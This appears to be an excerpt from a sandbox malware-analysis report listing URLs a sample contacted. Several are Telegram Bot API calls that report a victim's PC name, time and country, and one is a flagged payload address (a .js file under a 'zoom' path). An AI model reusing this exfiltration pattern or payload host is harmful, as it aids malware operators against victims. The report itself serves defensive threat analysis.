https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:29:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:21:05%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:59:31%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2011:39:43%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:39:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
http://192.210.215.11/zoom/aus1.js true
  • Avira URL Cloud: malware
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2010:30:54%0D%0ACountry%20Name:%20%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:835180%0D%0ADate%20and%20Time:%2028/08/2024%20/%2012:20:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20835180%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown